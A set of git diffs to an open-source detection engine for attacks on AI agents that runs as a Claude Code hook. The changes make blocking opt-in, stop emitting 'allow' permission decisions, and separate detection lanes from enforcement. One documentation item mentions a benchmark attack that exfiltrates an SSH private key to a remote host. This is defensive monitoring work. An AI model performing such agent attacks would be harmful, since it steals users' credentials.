+  previously inert. An earlier revision of this branch threw from the
+  constructor instead, which measured badly: `ATR_BLOCKING=enabled npx atr
+  guard` exited 1 with an empty stdout and no guard running — landing hardest on
+  the operator trying to turn enforcement ON — and a stray `ATR_LANE` in a shell
+  profile crashed the VS Code extension on activation. Neither process asked to
+  read the environment. An explicit bad argument (`new ATREngine({ lane })`)
+  still throws, because that is the caller's own bug rather than ambient state.
+  The warning names the variable, the bad value, and — for `ATR_BLOCKING` —
+  states outright that enforcement is NOT enabled; it is emitted once per
+  distinct value per process.
 
 - **`ActionExecutor` no longer dispatches response actions above the `observe`
   blast-radius tier unless blocking is enabled.** `alert` / `snapshot` /

--- a/INTEGRATION.md
+++ b/INTEGRATION.md
@@ -58,23 +58,37 @@ default** as of Unreleased:
 
 | Component | What it does | Enable with |
 |---|---|---|
-| `HookHandler` | Emits a Claude Code `permissionDecision` | `blocking: true`, or `ATR_BLOCKING` |
-| `ActionExecutor` | Dispatches `response.actions` to your `PlatformAdapter` | `blocking: true`, or `ATR_BLOCKING` |
+| `HookHandler` | Emits a Claude Code `permissionDecision` of `deny` or `ask` | `blocking: true` |
+| `ActionExecutor` | Dispatches `response.actions` to your `PlatformAdapter` | `blocking: true` |
 
-Without it, `HookHandler` omits `permissionDecision` entirely (it never emits
-`allow` as a downgrade — in the Claude Code contract that is affirmative approval
-and would suppress the host's own prompt), and `ActionExecutor` refuses any
-action above the `observe` blast-radius tier: `alert`, `snapshot`, `shadow` and
-`escalate` still reach your adapter, `block_*`, `reduce_permissions`,
-`reset_context`, `quarantine_session` and `kill_agent` do not.
+Without it, `HookHandler` omits `permissionDecision` entirely, and
+`ActionExecutor` refuses any action above the `observe` blast-radius tier:
+`alert`, `snapshot`, `shadow` and `escalate` still reach your adapter,
+`block_*`, `reduce_permissions`, `reset_context`, `quarantine_session` and
+`kill_agent` do not.
+
+**ATR never emits `permissionDecision: "allow"`, in either mode.** In the Claude
+Code contract `allow` is affirmative approval that suppresses the host's own
+permission prompt, so ATR emitting it would make the host less safe than having
+no hook installed. A verdict of `allow` means "no rule matched", which is not the
+same statement as "this operation is approved" — so nothing is emitted and the
+host stays on its own default path. With `blocking: true` you get `deny` and
+`ask` and nothing else.
 
 **If you already implement a `PlatformAdapter` that really blocks**, this is a
 behaviour change: pass `blocking: true` to keep dispatching those actions.
 
 Which rules are allowed to fire at all is a separate switch, the detection lane:
-`new ATREngine({ lane: 'enforce' | 'alert' | 'hunt' })`, or `ATR_LANE`. Default
-`hunt` (all maturities). Resolution order for both switches is explicit config >
-environment > default.
+`new ATREngine({ lane: 'enforce' | 'alert' | 'hunt' })`. Default `hunt` (all
+maturities).
+
+**Neither switch reads the environment when you embed ATR.** `ATREngine`,
+`ActionExecutor` and `HookHandler` take explicit config only, so a stray
+`ATR_LANE` or `ATR_BLOCKING` in the shell that happened to start your process
+cannot change what your integration detects or does. `ATR_LANE` and
+`ATR_BLOCKING` are read by the `atr` CLI, which passes the resolved values down.
+If you want that behaviour in your own entry point, call
+`resolveEnforcementPolicy()` and pass the result in yourself.
 
 ### Semantic LLM-as-Judge
 

--- a/INTEGRATION.md
+++ b/INTEGRATION.md
@@ -50,6 +50,32 @@ for (const match of matches) {
 }
 ```
 
+### Detection vs enforcement
+
+Step 3 above is the interface most integrations use: ATR reports, you decide.
+Two optional ATR components can act on your behalf instead, and **both are off by
+default** as of Unreleased:
+
+| Component | What it does | Enable with |
+|---|---|---|
+| `HookHandler` | Emits a Claude Code `permissionDecision` | `blocking: true`, or `ATR_BLOCKING` |
+| `ActionExecutor` | Dispatches `response.actions` to your `PlatformAdapter` | `blocking: true`, or `ATR_BLOCKING` |
+
+Without it, `HookHandler` omits `permissionDecision` entirely (it never emits
+`allow` as a downgrade — in the Claude Code contract that is affirmative approval
+and would suppress the host's own prompt), and `ActionExecutor` refuses any
+action above the `observe` blast-radius tier: `alert`, `snapshot`, `shadow` and
+`escalate` still reach your adapter, `block_*`, `reduce_permissions`,
+`reset_context`, `quarantine_session` and `kill_agent` do not.
+
+**If you already implement a `PlatformAdapter` that really blocks**, this is a
+behaviour change: pass `blocking: true` to keep dispatching those actions.
+
+Which rules are allowed to fire at all is a separate switch, the detection lane:
+`new ATREngine({ lane: 'enforce' | 'alert' | 'hunt' })`, or `ATR_LANE`. Default
+`hunt` (all maturities). Resolution order for both switches is explicit config >
+environment > default.
+
 ### Semantic LLM-as-Judge
 
 Rule-level `detection.method: semantic` uses an injected judge function and the async engine path:

--- a/README.md
+++ b/README.md
@@ -219,24 +219,45 @@ Lanes are opt-in and fully backward-compatible: the default is `hunt`, so existi
 
 Detection always runs. **Blocking is opt-in and off by default.** In the default
 mode `atr guard` reports what it found and changes nothing: it emits no
-permission decision to the host — the field is omitted, not set to `allow`,
-because `allow` is affirmative approval in that contract and would suppress the
-host's own permission prompt — and it dispatches no response action above the
+permission decision to the host, and it dispatches no response action above the
 `observe` blast-radius tier (`alert` / `snapshot` / `shadow` / `escalate` still
 run). Turning blocking on is the explicit operator directive [SPEC.md](SPEC.md)
 §5.5 requires before an engine may execute response actions automatically.
 ([spec/atr-method-v1.1.md](spec/atr-method-v1.1.md) §5.6 says the same thing for
 hash matches specifically; §5.5 of SPEC.md is the engine-wide one.)
 
-| Switch | Flag | Environment | Default |
-|---|---|---|---|
-| Detection lane | `--lane <enforce\|alert\|hunt>` | `ATR_LANE` | `hunt` |
-| Blocking | `--blocking` / `--no-blocking` | `ATR_BLOCKING` | off |
+**ATR never answers `permissionDecision: "allow"` — in either mode.** That
+decision is not neutral in the Claude Code contract; it is an affirmative
+approval that suppresses the host's own permission prompt, so answering it on
+every operation ATR had not looked for would make a hooked session permit *more*
+than an unhooked one. A permission decision is emitted only to **restrain** —
+`deny` or `ask` — and only with blocking on. Any other verdict omits the whole
+`hookSpecificOutput` envelope, and the finding travels in `atr_decision`,
+`atr_reason` and `matched_rules` instead. Turning blocking on does not bring the
+affirmative decision back.
 
-Resolution order for both: explicit programmatic config > environment > default.
-On the command line an unrecognised value is a usage error, never a silent
-fallback — `atr guard --lane enfroce` exits 1 with
+| Switch | CLI flag | Environment (CLI only) | Library config | Default |
+|---|---|---|---|---|
+| Detection lane | `--lane <enforce\|alert\|hunt>` | `ATR_LANE` | `new ATREngine({ lane })` | `hunt` |
+| Blocking | `--blocking` / `--no-blocking` | `ATR_BLOCKING` | `blocking` on `ActionExecutor` / `HookHandler` | off |
+
+**The two surfaces resolve differently, and they do not share a chain:**
+
+- **Library** — explicit config **>** built-in default. `ATREngine`,
+  `ActionExecutor` and `HookHandler` do not read the environment at all, so an
+  embedded engine cannot be re-pointed by a variable the host never set.
+- **CLI** — flag **>** environment variable **>** built-in default.
+
+An unrecognised `--lane` value is a usage error, never a silent fallback:
+`atr guard --lane enfroce` exits 1 with
 `Error: Invalid --lane "enfroce". Expected one of: enforce, alert, hunt.`
+An unrecognised value in the *environment* warns on stderr, falls back to the
+safe default and keeps running (exit 0), because `atr guard` runs as a Claude
+Code command hook where a non-zero exit discards every detection and prints no
+reason. If `ATR_LANE` is the variable that could not be read, blocking is forced
+off even when `--blocking` was passed — the fallback lane is the broadest one,
+and enforcing on a lane the operator never chose is the only degradation that
+would be more dangerous than the request.
 
 ```bash
 atr guard                                 # advisory: report only (the default)
@@ -270,7 +291,12 @@ PY
 
 Programmatic embedding: `new ATREngine({ lane })` for the lane,
 `new ActionExecutor({ adapter, blocking })` and
-`new HookHandler({ engine, executor, blocking })` for enforcement.
+`new HookHandler({ engine, executor, blocking })` for enforcement. **These are
+the only inputs** — the constructors ignore `ATR_LANE` and `ATR_BLOCKING`, so
+setting them will not configure an embedded engine. An unrecognised lane throws
+a `TypeError`, and so does a non-boolean `blocking`: `blocking: "false"` is a
+string, and every non-empty string is truthy, so it used to switch enforcement
+**on** while reading as an explicit "off".
 
 ## 5. Specification
 

--- a/README.md
+++ b/README.md
@@ -219,7 +219,7 @@ Lanes are opt-in and fully backward-compatible: the default is `hunt`, so existi
 
 Detection always runs. **Blocking is opt-in and off by default.** In the default
 mode `atr guard` reports what it found and changes nothing: it emits no
-`permissionDecision` to the host — the field is omitted, not set to `allow`,
+permission decision to the host — the field is omitted, not set to `allow`,
 because `allow` is affirmative approval in that contract and would suppress the
 host's own permission prompt — and it dispatches no response action above the
 `observe` blast-radius tier (`alert` / `snapshot` / `shadow` / `escalate` still

--- a/README.md
+++ b/README.md
@@ -234,12 +234,38 @@ hash matches specifically; §5.5 of SPEC.md is the engine-wide one.)
 | Blocking | `--blocking` / `--no-blocking` | `ATR_BLOCKING` | off |
 
 Resolution order for both: explicit programmatic config > environment > default.
-An unrecognised value is an error, never a silent fallback.
+On the command line an unrecognised value is a usage error, never a silent
+fallback — `atr guard --lane enfroce` exits 1 with
+`Error: Invalid --lane "enfroce". Expected one of: enforce, alert, hunt.`
 
 ```bash
-atr guard                                 # advisory: report only
-atr guard --lane enforce --blocking       # block, stable rules only
+atr guard                                 # advisory: report only (the default)
+atr guard --lane enforce --blocking       # blocking on, and only the 106 of 777
+                                          # live rules that are maturity: stable
+                                          # may fire (see the recall note below)
 ATR_LANE=enforce ATR_BLOCKING=1 atr guard # the same, via the environment
+```
+
+**`--lane enforce` costs recall, and the cost is large.** It loads only
+`maturity: stable` rules: **106 of the 777 live rules** in this repository at the
+commit this paragraph was written against. That is the trade being made every
+time enforcement is recommended alongside it — narrower firing set, lower
+false-positive rate, fewer attacks caught. Rule counts move daily, and a
+`grep`-based count is wrong here (eight rules quote the value as
+`maturity: "stable"`), so re-derive by parsing before quoting the figure
+anywhere:
+
+```bash
+python3 - <<'PY'
+import glob, yaml
+rules = [yaml.safe_load(open(p, encoding='utf-8'))
+         for p in glob.glob('rules/**/*.yaml', recursive=True)]
+live = [r for r in rules
+        if r.get('status') not in ('draft', 'deprecated')
+        and str(r.get('maturity') or '').strip() != 'deprecated']
+stable = [r for r in live if str(r.get('maturity') or '').strip() == 'stable']
+print(f'files={len(rules)} live={len(live)} enforce={len(stable)}')
+PY
 ```
 
 Programmatic embedding: `new ATREngine({ lane })` for the lane,

--- a/README.md
+++ b/README.md
@@ -215,6 +215,36 @@ Each rule carries a maturity-driven **lane**, so a consumer can trade recall for
 
 Lanes are opt-in and fully backward-compatible: the default is `hunt`, so existing integrations behave exactly as before. Selecting `enforce` raises precision by firing only the most mature rules — and therefore catches fewer attacks. Report false-positive rates lane-keyed (`enforce` ~0.24% / `hunt` ~9% on the 65K-sample benign gate), not as a single overall figure. That gate is a separate corpus from the per-source measurements in [§8 Evaluation](#8-evaluation).
 
+### Detection and enforcement are separate switches
+
+Detection always runs. **Blocking is opt-in and off by default.** In the default
+mode `atr guard` reports what it found and changes nothing: it emits no
+`permissionDecision` to the host — the field is omitted, not set to `allow`,
+because `allow` is affirmative approval in that contract and would suppress the
+host's own permission prompt — and it dispatches no response action above the
+`observe` blast-radius tier (`alert` / `snapshot` / `shadow` / `escalate` still
+run). This is the operator directive [SPEC.md](SPEC.md) §5.5 and
+[spec/atr-method-v1.1.md](spec/atr-method-v1.1.md) §164 require before an engine
+may auto-block.
+
+| Switch | Flag | Environment | Default |
+|---|---|---|---|
+| Detection lane | `--lane <enforce\|alert\|hunt>` | `ATR_LANE` | `hunt` |
+| Blocking | `--blocking` / `--no-blocking` | `ATR_BLOCKING` | off |
+
+Resolution order for both: explicit programmatic config > environment > default.
+An unrecognised value is an error, never a silent fallback.
+
+```bash
+atr guard                                 # advisory: report only
+atr guard --lane enforce --blocking       # block, stable rules only
+ATR_LANE=enforce ATR_BLOCKING=1 atr guard # the same, via the environment
+```
+
+Programmatic embedding: `new ATREngine({ lane })` for the lane,
+`new ActionExecutor({ adapter, blocking })` and
+`new HookHandler({ engine, executor, blocking })` for enforcement.
+
 ## 5. Specification
 
 | Artifact | Path | Purpose |

--- a/README.md
+++ b/README.md
@@ -223,9 +223,10 @@ permission decision to the host — the field is omitted, not set to `allow`,
 because `allow` is affirmative approval in that contract and would suppress the
 host's own permission prompt — and it dispatches no response action above the
 `observe` blast-radius tier (`alert` / `snapshot` / `shadow` / `escalate` still
-run). This is the operator directive [SPEC.md](SPEC.md) §5.5 and
-[spec/atr-method-v1.1.md](spec/atr-method-v1.1.md) §164 require before an engine
-may auto-block.
+run). Turning blocking on is the explicit operator directive [SPEC.md](SPEC.md)
+§5.5 requires before an engine may execute response actions automatically.
+([spec/atr-method-v1.1.md](spec/atr-method-v1.1.md) §5.6 says the same thing for
+hash matches specifically; §5.5 of SPEC.md is the engine-wide one.)
 
 | Switch | Flag | Environment | Default |
 |---|---|---|---|

--- a/action.yml
+++ b/action.yml
@@ -14,6 +14,14 @@ inputs:
     description: 'Minimum severity to report (informational, low, medium, high, critical)'
     required: false
     default: 'medium'
+  lane:
+    description: >-
+      Detection lane: enforce (maturity=stable rules only), alert (stable+test),
+      or hunt (all maturities). Default hunt keeps CI visibility broad. This
+      action only reports findings - it never blocks an agent - so there is no
+      blocking opt-in here; see ATR_BLOCKING for the runtime guard.
+    required: false
+    default: 'hunt'
   fail-on-finding:
     description: 'Fail the action if threats are found'
     required: false
@@ -53,6 +61,7 @@ runs:
       env:
         ATR_PATH: ${{ inputs.path }}
         ATR_SEVERITY: ${{ inputs.severity }}
+        ATR_SCAN_LANE: ${{ inputs.lane }}
         ATR_SARIF_FILE: ${{ inputs.sarif-file }}
         ATR_FAIL_ON_FINDING: ${{ inputs.fail-on-finding }}
       run: |
@@ -62,6 +71,12 @@ runs:
         case "$ATR_SEVERITY" in
           informational|low|medium|high|critical) ;;
           *) echo "::error::Invalid severity: $ATR_SEVERITY"; exit 1 ;;
+        esac
+
+        # Validate lane input
+        case "$ATR_SCAN_LANE" in
+          enforce|alert|hunt) ;;
+          *) echo "::error::Invalid lane: $ATR_SCAN_LANE (must be enforce, alert or hunt)"; exit 1 ;;
         esac
 
         # Validate fail-on-finding input
@@ -84,6 +99,7 @@ runs:
         ATR_STDERR=$(mktemp)
         atr scan "$ATR_PATH" \
           --severity "$ATR_SEVERITY" \
+          --lane "$ATR_SCAN_LANE" \
           --sarif > "$ATR_SARIF_FILE" 2>"$ATR_STDERR"
 
         if [ ! -s "$ATR_SARIF_FILE" ]; then

--- a/docs/RESPONSE-ACTION-ELIGIBILITY.md
+++ b/docs/RESPONSE-ACTION-ELIGIBILITY.md
@@ -353,15 +353,19 @@ minus `status: draft` / `status: deprecated` / `maturity: deprecated`.
   kill the guard "executes" is written into a buffer nobody drains. Either wire
   the buffer into the hook response or delete the methods' pretence — a security
   control that silently does nothing is the worst of the three states.
-- `atr guard` defaults to `lane: 'hunt'` (§1a), so `atr init` installs a hook in
-  which every experimental rule fires. Whether the shipped default should be
-  `alert` is a product decision, not a rule-quality one, but it is currently
-  made by omission rather than on purpose.
-- `SPEC.md` §5.5 says "Engines MUST NOT execute response actions automatically
-  without an explicit configuration directive from the operator." Passing an
-  `ActionExecutor` is arguably that directive, but the spec sentence and the
-  engine's behaviour should be reconciled explicitly rather than by
-  interpretation.
+- ~~`atr guard` defaults to `lane: 'hunt'` (§1a), so `atr init` installs a hook in
+  which every experimental rule fires.~~ **Partly addressed (Unreleased).** The
+  default is still `hunt`, but it is now a choice an operator can change:
+  `--lane` on `atr guard` / `atr scan`, `ATR_LANE` in the environment, `lane` on
+  the GitHub Action. More importantly the hook that `atr init` installs no longer
+  blocks at all by default — see the next item — so "every experimental rule
+  fires" now means "every experimental rule is reported".
+- ~~`SPEC.md` §5.5 ... Passing an `ActionExecutor` is arguably that directive~~
+  **Addressed (Unreleased).** Passing an executor is no longer treated as the
+  directive. `ActionExecutor` refuses to dispatch any action above the `observe`
+  tier unless `blocking` is set (config > `ATR_BLOCKING` > off), and the hook
+  emits no `permissionDecision` in that state. The directive is now a named,
+  documented switch instead of an interpretation.
 - The verdict path (`severity` + `confidence` → `permissionDecision`) has no
   precision input at all. That is a second, larger line: it _would_ change what
   the engine blocks, so it needs its own recall analysis and is out of scope here.

--- a/docs/RESPONSE-ACTION-ELIGIBILITY.md
+++ b/docs/RESPONSE-ACTION-ELIGIBILITY.md
@@ -356,16 +356,27 @@ minus `status: draft` / `status: deprecated` / `maturity: deprecated`.
 - ~~`atr guard` defaults to `lane: 'hunt'` (§1a), so `atr init` installs a hook in
   which every experimental rule fires.~~ **Partly addressed (Unreleased).** The
   default is still `hunt`, but it is now a choice an operator can change:
-  `--lane` on `atr guard` / `atr scan`, `ATR_LANE` in the environment, `lane` on
-  the GitHub Action. More importantly the hook that `atr init` installs no longer
+  `--lane` on `atr guard` / `atr scan`, `ATR_LANE` in the environment of those
+  commands, `lane` on the GitHub Action, `lane` in `ATREngineConfig` when
+  embedding. More importantly the hook that `atr init` installs no longer
   blocks at all by default — see the next item — so "every experimental rule
   fires" now means "every experimental rule is reported".
 - ~~`SPEC.md` §5.5 ... Passing an `ActionExecutor` is arguably that directive~~
   **Addressed (Unreleased).** Passing an executor is no longer treated as the
   directive. `ActionExecutor` refuses to dispatch any action above the `observe`
-  tier unless `blocking` is set (config > `ATR_BLOCKING` > off), and the hook
-  emits no `permissionDecision` in that state. The directive is now a named,
-  documented switch instead of an interpretation.
+  tier unless `blocking` is set (explicit config only; `atr guard` maps
+  `--blocking` / `ATR_BLOCKING` onto it), and the hook emits no
+  `permissionDecision` in that state. The directive is now a named, documented
+  switch instead of an interpretation.
+- ~~The hook answers `permissionDecision: "allow"` when no rule matches.~~
+  **Addressed (Unreleased).** It no longer answers at all in that case. `allow`
+  is affirmative approval in the Claude Code contract, so "no rule matched" was
+  being reported to the host as "ATR approves this" — measured on the 451
+  attacks in `data/pint-benchmark/pint-corpus.json` under `--blocking --lane
+  enforce`, where only `maturity: stable` rules may fire: 451 of 451 came back
+  `allow`, including an `~/.ssh/id_rsa` exfiltration to a remote host. ATR now
+  emits a decision only to restrain (`deny` / `ask`); an `allow` verdict omits
+  the whole `hookSpecificOutput` envelope and the host keeps its own prompt.
 - The verdict path (`severity` + `confidence` → `permissionDecision`) has no
   precision input at all. That is a second, larger line: it _would_ change what
   the engine blocks, so it needs its own recall analysis and is out of scope here.

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "agent-threat-rules",
-  "version": "3.5.12",
+  "version": "4.0.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "agent-threat-rules",
-      "version": "3.5.12",
+      "version": "4.0.0",
       "license": "MIT",
       "dependencies": {
         "@modelcontextprotocol/sdk": "^1.12.0",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "agent-threat-rules",
-  "version": "3.5.12",
+  "version": "4.0.0",
   "mcpName": "io.github.Agent-Threat-Rule/agent-threat-rules",
   "type": "module",
   "description": "Open detection standard -- like Sigma, but for AI agents. Executable rules for prompt injection, tool poisoning, context exfiltration, and MCP attacks. Shipped in Cisco AI Defense. MIT-licensed.",

--- a/src/action-executor.ts
+++ b/src/action-executor.ts
@@ -6,9 +6,10 @@
  * does not block the rest.
  *
  * ENFORCEMENT GATE: actions above the OBSERVE blast-radius tier are dispatched
- * only when the operator has enabled blocking (`blocking: true`, ATR_BLOCKING,
- * or `atr guard --blocking`). Without it they are recorded as suppressed and the
- * adapter is never called. See src/enforcement.ts for why this is opt-in and
+ * only when the operator has enabled blocking (`blocking: true` here; the CLI
+ * maps ATR_BLOCKING / `atr guard --blocking` onto it). Without it they are
+ * recorded as suppressed and the adapter is never called. See
+ * src/enforcement.ts for why this is opt-in and
  * src/quality/action-eligibility.ts for the tier ladder this gate reads.
  *
  * @module agent-threat-rules/action-executor
@@ -20,7 +21,7 @@ import type {
   ExecutionContext,
   PlatformAdapter,
 } from "./types.js";
-import { isEnforcementAction, resolveBlockingOrWarn } from "./enforcement.js";
+import { isEnforcementAction, blockingFromConfig } from "./enforcement.js";
 import { TIER_NAMES, actionTier } from "./quality/action-eligibility.js";
 
 /** Priority order: lower number = higher priority (executed first) */
@@ -73,8 +74,12 @@ export interface ActionExecutorConfig {
    * (block_input / block_output / block_tool / reduce_permissions /
    * reset_context / quarantine_session / kill_agent) is refused before the
    * adapter is touched; OBSERVE actions (alert / snapshot / shadow / escalate)
-   * run exactly as before. Resolution order is this field > ATR_BLOCKING in the
-   * environment > false — see src/enforcement.ts.
+   * run exactly as before.
+   *
+   * This field is the only input — the executor does not read `ATR_BLOCKING`.
+   * A non-boolean throws rather than being coerced: `blocking: "false"` is
+   * truthy in JavaScript and would otherwise enable enforcement. `atr guard`
+   * resolves the environment itself and passes the result here.
    *
    * This is the runtime half of SPEC.md §5.5 ("Engines MUST NOT execute
    * response actions automatically without an explicit configuration directive
@@ -95,7 +100,7 @@ export class ActionExecutor {
   constructor(config: ActionExecutorConfig) {
     this.adapter = config.adapter;
     this.dryRun = config.dryRun ?? false;
-    this.blocking = resolveBlockingOrWarn(config.blocking);
+    this.blocking = blockingFromConfig(config.blocking);
     this.onActionComplete = config.onActionComplete;
   }
 
@@ -157,7 +162,8 @@ export class ActionExecutor {
         success: true,
         message:
           `[advisory] Suppressed ${action} (tier ${TIER_NAMES[actionTier(action)]}): ` +
-          `blocking is disabled. Enable it with ATR_BLOCKING=1 or --blocking.`,
+          `blocking is disabled. Enable it with blocking: true (atr guard: ` +
+          `--blocking or ATR_BLOCKING=1).`,
         timestamp,
       });
     }

--- a/src/action-executor.ts
+++ b/src/action-executor.ts
@@ -5,6 +5,12 @@
  * to a PlatformAdapter. Handles per-action errors so one failure
  * does not block the rest.
  *
+ * ENFORCEMENT GATE: actions above the OBSERVE blast-radius tier are dispatched
+ * only when the operator has enabled blocking (`blocking: true`, ATR_BLOCKING,
+ * or `atr guard --blocking`). Without it they are recorded as suppressed and the
+ * adapter is never called. See src/enforcement.ts for why this is opt-in and
+ * src/quality/action-eligibility.ts for the tier ladder this gate reads.
+ *
  * @module agent-threat-rules/action-executor
  */
 
@@ -14,6 +20,8 @@ import type {
   ExecutionContext,
   PlatformAdapter,
 } from "./types.js";
+import { isEnforcementAction, resolveBlocking } from "./enforcement.js";
+import { TIER_NAMES, actionTier } from "./quality/action-eligibility.js";
 
 /** Priority order: lower number = higher priority (executed first) */
 const ACTION_PRIORITY: Readonly<Record<ATRAction, number>> = {
@@ -58,17 +66,36 @@ export const ACTION_METHOD_MAP: Readonly<Record<ATRAction, keyof PlatformAdapter
 export interface ActionExecutorConfig {
   readonly adapter: PlatformAdapter;
   readonly dryRun?: boolean;
+  /**
+   * Operator directive permitting enforcement actions. OFF BY DEFAULT.
+   *
+   * When false, any action above the OBSERVE blast-radius tier
+   * (block_input / block_output / block_tool / reduce_permissions /
+   * reset_context / quarantine_session / kill_agent) is refused before the
+   * adapter is touched; OBSERVE actions (alert / snapshot / shadow / escalate)
+   * run exactly as before. Resolution order is this field > ATR_BLOCKING in the
+   * environment > false — see src/enforcement.ts.
+   *
+   * This is the runtime half of SPEC.md §5.5 ("Engines MUST NOT execute
+   * response actions automatically without an explicit configuration directive
+   * from the operator"). Until it existed, `atr guard` built an executor
+   * unconditionally and dispatched every declared action, including on a verdict
+   * of `allow`.
+   */
+  readonly blocking?: boolean;
   readonly onActionComplete?: (result: ActionResult) => void;
 }
 
 export class ActionExecutor {
   private readonly adapter: PlatformAdapter;
   private readonly dryRun: boolean;
+  private readonly blocking: boolean;
   private readonly onActionComplete?: (result: ActionResult) => void;
 
   constructor(config: ActionExecutorConfig) {
     this.adapter = config.adapter;
     this.dryRun = config.dryRun ?? false;
+    this.blocking = resolveBlocking(config.blocking);
     this.onActionComplete = config.onActionComplete;
   }
 
@@ -119,6 +146,21 @@ export class ActionExecutor {
     context: ExecutionContext,
   ): Promise<ActionResult> {
     const timestamp = new Date().toISOString();
+
+    // Enforcement gate — checked BEFORE dry-run, because "would execute" is
+    // false for an action that enforcement policy forbids. The adapter is never
+    // reached, so a downstream adapter that really blocks cannot act while the
+    // hook channel is telling the host nothing.
+    if (!this.blocking && isEnforcementAction(action)) {
+      return Object.freeze({
+        action,
+        success: true,
+        message:
+          `[advisory] Suppressed ${action} (tier ${TIER_NAMES[actionTier(action)]}): ` +
+          `blocking is disabled. Enable it with ATR_BLOCKING=1 or --blocking.`,
+        timestamp,
+      });
+    }
 
     if (this.dryRun) {
       return Object.freeze({
@@ -173,5 +215,10 @@ export class ActionExecutor {
   /** Check if dry-run mode is enabled */
   isDryRun(): boolean {
     return this.dryRun;
+  }
+
+  /** Is this executor permitted to dispatch enforcement actions? */
+  isBlocking(): boolean {
+    return this.blocking;
   }
 }

--- a/src/action-executor.ts
+++ b/src/action-executor.ts
@@ -20,7 +20,7 @@ import type {
   ExecutionContext,
   PlatformAdapter,
 } from "./types.js";
-import { isEnforcementAction, resolveBlocking } from "./enforcement.js";
+import { isEnforcementAction, resolveBlockingOrWarn } from "./enforcement.js";
 import { TIER_NAMES, actionTier } from "./quality/action-eligibility.js";
 
 /** Priority order: lower number = higher priority (executed first) */
@@ -95,7 +95,7 @@ export class ActionExecutor {
   constructor(config: ActionExecutorConfig) {
     this.adapter = config.adapter;
     this.dryRun = config.dryRun ?? false;
-    this.blocking = resolveBlocking(config.blocking);
+    this.blocking = resolveBlockingOrWarn(config.blocking);
     this.onActionComplete = config.onActionComplete;
   }
 

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -18,6 +18,8 @@ import { loadRuleFile, loadRulesFromDirectory, validateRule } from './loader.js'
 import type { AgentEvent, ATRMatch, ATRRule, ATRTrace } from './types.js';
 import { generateBadgeSvg, generateBadgeEndpoint, lookupPackageScan, generateBadgeMarkdown } from './badge.js';
 import { cmdScanUnified } from './cli/scan-handler.js';
+import { BLOCKING_ENV_VAR, LANE_ENV_VAR, parseLane } from './enforcement.js';
+import { LANES, type Lane } from './quality/rule-contract.js';
 
 const __filename = fileURLToPath(import.meta.url);
 const __dirname = dirname(__filename);
@@ -51,7 +53,8 @@ ${BOLD}Usage:${RESET}
   atr stats [--rules <dir>]                Show rule collection statistics
   atr convert <splunk|elastic> [--rules <dir>] [--output <file>]
                                            Convert rules to SIEM query format
-  atr guard [--rules <dir>] [--dry-run]    Start as Claude Code hook (stdio)
+  atr guard [--rules <dir>] [--dry-run] [--lane <l>] [--blocking]
+                                           Start as Claude Code hook (stdio)
   atr init [--global]                      Setup ATR guard hook for Claude Code
   atr mcp                                  Start MCP server (stdio transport)
   atr scaffold                             Interactive rule scaffolding
@@ -80,6 +83,14 @@ ${BOLD}Options:${RESET}
   --no-report        Disable anonymous Threat Cloud reporting (enabled by default)
   --fail-on <sev>    Exit non-zero if matches at/above this severity are found (for CI / pre-commit gates)
   --tc-url <url>     Threat Cloud endpoint (default: https://tc.panguard.ai)
+  --lane <lane>    Detection lane: enforce (stable rules only) | alert
+                   (stable+test) | hunt (all maturities). Overrides ATR_LANE.
+                   Default: hunt.
+  --blocking       Allow ATR to block. OFF BY DEFAULT: without it the guard
+                   reports detections but emits no permissionDecision and runs
+                   no response action above the observe tier. Overrides
+                   ATR_BLOCKING.
+  --no-blocking    Force blocking off even if ATR_BLOCKING is set.
   --dry-run        Log actions without executing (guard mode)
   --fail-open      Default to allow on errors (guard mode, default: true)
   --timeout <ms>   Evaluation timeout in ms (guard mode, default: 5000)
@@ -102,8 +113,14 @@ ${BOLD}Examples:${RESET}
   ${DIM}# One-command Claude Code hook setup${RESET}
   atr init
 
-  ${DIM}# Run as a Claude Code guard hook${RESET}
+  ${DIM}# Run as a Claude Code guard hook (advisory: reports, never blocks)${RESET}
   atr guard --rules ./my-rules
+
+  ${DIM}# Opt in to blocking, restricted to stable rules${RESET}
+  atr guard --lane enforce --blocking
+
+  ${DIM}# Same, via the environment${RESET}
+  ${LANE_ENV_VAR}=enforce ${BLOCKING_ENV_VAR}=1 atr guard
 
   ${DIM}# Start MCP server for AI agent integration${RESET}
   atr mcp
@@ -128,7 +145,7 @@ function parseArgs(argv: string[]): { command: string; target: string; options: 
   for (let i = 1; i < args.length; i++) {
     if (args[i].startsWith('--')) {
       const key = args[i].slice(2);
-      if (key === 'json' || key === 'sarif' || key === 'help' || key === 'dry-run' || key === 'fail-open' || key === 'global' || key === 'svg' || key === 'no-report' || key === 'report-to-cloud' || key === 'semantic' || key === 'semantic-no-json-mode') {
+      if (key === 'json' || key === 'sarif' || key === 'help' || key === 'dry-run' || key === 'fail-open' || key === 'global' || key === 'svg' || key === 'no-report' || key === 'report-to-cloud' || key === 'semantic' || key === 'semantic-no-json-mode' || key === 'blocking' || key === 'no-blocking') {
         options[key] = 'true';
       } else {
         options[key] = args[++i] ?? '';
@@ -139,6 +156,48 @@ function parseArgs(argv: string[]): { command: string; target: string; options: 
   }
 
   return { command, target, options };
+}
+
+// --- ENFORCEMENT policy options (shared by guard + scan) ---
+
+/**
+ * Read `--lane <enforce|alert|hunt>`.
+ *
+ * Returns undefined when the flag is absent so the engine falls through to
+ * ATR_LANE and then to the built-in default; an unrecognised value is a usage
+ * error, never a silent fallback (an operator who typed `--lane enfroce` must
+ * not be left believing they are enforcing).
+ */
+function readLaneOption(options: Record<string, string>): Lane | undefined {
+  const raw = options['lane'];
+  if (raw === undefined || raw.trim() === '') return undefined;
+
+  const parsed = parseLane(raw);
+  if (parsed === null) {
+    console.error(
+      `${RED}Error: Invalid --lane "${raw}". Expected one of: ${LANES.join(', ')}.${RESET}`
+    );
+    process.exit(1);
+  }
+  return parsed;
+}
+
+/**
+ * Read the blocking opt-in: `--blocking` turns enforcement on, `--no-blocking`
+ * turns it off explicitly. Absent means "no opinion" -> the environment
+ * (ATR_BLOCKING) decides, then the default (off).
+ */
+function readBlockingOption(options: Record<string, string>): boolean | undefined {
+  const on = options['blocking'] === 'true';
+  const off = options['no-blocking'] === 'true';
+
+  if (on && off) {
